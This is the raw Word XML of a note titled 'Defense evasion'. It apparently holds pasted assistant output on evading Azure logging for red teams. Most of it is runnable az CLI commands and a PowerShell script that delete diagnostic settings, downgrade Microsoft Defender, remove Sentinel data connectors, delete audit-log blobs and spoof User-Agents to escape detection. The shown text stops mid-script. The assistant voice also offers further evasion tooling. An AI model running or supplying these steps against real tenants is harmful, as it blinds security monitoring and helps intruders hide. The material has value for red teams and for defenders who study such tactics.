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001B9" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defense evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EBFCA" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, summarized, and Azure-adapted version</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> of the original AWS CloudTrail tampering example, rewritten for </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C0A152" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="60F980B5" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E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🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>♂️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure - Log Evasion &amp; Monitoring Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB8940" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D52DD" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Disrupt or evade Azure logging and monitoring (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Activity Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Defender for Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>) during post-exploitation or red team assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440B05E" w14:textId="7675C7AD" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="30BAD5F3" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Tactics (inspired by AWS CloudTrail evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE8FEA" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>1. Disable or Obfuscate Azure Activity Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3C62B" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Azure does not allow full disabling of Activity Logs, but you can attempt to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08664860" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dissociate Diagnostic Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> that send logs to SIEM/storage/event hubs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F33BCD" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az monitor diagnostic-settings list --resource &lt;resource-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A18C4" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az monitor diagnostic-settings delete --resource &lt;resource-id&gt; --name &lt;setting-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4E341" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Requires high privileges (e.g., Monitoring Contributor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF1C77" w14:textId="0E2ED73A" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="01E3D1A2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>2. Disable Defender for Cloud Protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDE382" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>If permissions allow, downgrade or disable Microsoft Defender for a subscription or resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DB9CA" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># List current Defender settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D3068" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az security pricing list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406DE33" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="06870AE5" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Disable Defender for a resource type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9A7CC" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az security pricing create --name VirtualMachines --tier Free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66DDDA" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Defender downgrades may be logged and trigger alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B59DC80" w14:textId="22BB6DDC" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="116CC7FC" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>3. Disable Sentinel Log Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540CBD7" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>If Azure Sentinel is deployed, you can try disabling data connectors (again, high privilege required):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8C0E8" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az sentinel data-connector delete \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D8144" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --name &lt;connector-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04C048" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --workspace-name &lt;sentinel-workspace&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405154EF" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --resource-group &lt;resource-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34394E" w14:textId="1DA50F23" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="6D872F10" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>4. Evade Detection with Custom User-Agents (CloudShell / CLI Fingerprint Obfuscation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76256ED2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Some tools (like AWS GuardDuty) flag suspicious environments (e.g., Kali/Parrot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151971CB" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom User-Agent strings</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> to avoid logging "tell-tale" attacker environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F23D5" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>In Azure, you can customize az User-Agent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E66DE" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>export AZURE_HTTP_USER_AGENT="Mozilla/5.0 legit-user"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D06E0" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>In Python scripts using azure-identity or requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D8A02" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>headers = {'User-Agent': 'Microsoft-AzureCLI/2.56.0'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E41EE8" w14:textId="44EAEFD9" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="24827C41" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t>5. Tamper or Delete Log Storage Accounts (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE59883" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>If logs are sent to a storage account (e.g., via diagnostic settings), and you have access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18BDB2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Delete specific log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033222EB" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az storage blob delete --container-name insights-logs-auditlogs --name &lt;blob-name&gt; --account-name &lt;logstorage&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35724F43" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❗</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>Tampering with audit logs is highly suspicious and typically triggers Defender or Sentinel alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D579887" w14:textId="23DF346D" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="2483660F" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E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🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Defense Consideration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF2065" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Unlike AWS CloudTrail, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Activity Logs cannot be disabled entirely</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>, and tampering is harder at scale. However, with high privilege credentials, diagnostic settings can be manipulated to blind security tooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA9F73" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00000000" w:rsidP="00061F5E">
      <w:r>
        <w:pict w14:anchorId="00219830">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983FA08" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like a PowerShell version or a tool-agnostic checklist for Azure log evasion?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371BFD77" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D7A209" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell version</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tool-agnostic checklist</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure log evasion techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> commonly used during red team or post-exploitation scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36700B03" w14:textId="3FDB1785" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="03634078" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00B5593C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> PowerShell Script: Azure Log Evasion (Advanced Use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ACEEEC" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> Requires Contributor or higher roles. Use only in </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authorized environments</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32569779" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Azure Log Evasion - PowerShell Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDB83A" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># Goal: Tamper with diagnostic settings and Defender/Sentinel protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691568C" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="30B20BA8" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === CONFIGURATION ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975FADB" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$resourceId = "/subscriptions/&lt;sub-id&gt;/resourceGroups/&lt;rg&gt;/providers/Microsoft.Compute/virtualMachines/&lt;vm-name&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2580B1" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$diagSettingName = "diag-logs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC6FE08" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$workspaceName = "log-workspace"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C834D" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$workspaceRG = "log-rg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15E754" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="225870DC" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 1: Remove Diagnostic Settings (disables log export to SIEM/storage) ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE7E9D" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Deleting diagnostic settings..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197C2CF2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Remove-AzDiagnosticSetting -ResourceId $resourceId -Name $diagSettingName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD50692" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="4669F3E4" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 2: Downgrade Microsoft Defender Plan (e.g., VM scope) ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE5E66" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Downgrading Microsoft Defender..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47385076" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Set-AzSecurityPricing -Name "VirtualMachines" -PricingTier "Free"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56739DCD" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="2C79A0A2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 3: Remove Azure Sentinel Data Connector ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114348D" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Removing Azure Sentinel connector (if exists)..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30ECED" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Remove-AzSentinelDataConnector -ResourceGroupName $workspaceRG `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FE028F" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  -WorkspaceName $workspaceName -DataConnectorId "&lt;connector-id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B50636" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="4CBC0C6D" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 4: Set a clean User-Agent for your session (to avoid detection) ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65357E06" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Setting custom User-Agent..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50309082" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t>$env:AZURE_HTTP_USER_AGENT = "Microsoft-AzureCLI/2.56.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224AD61" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
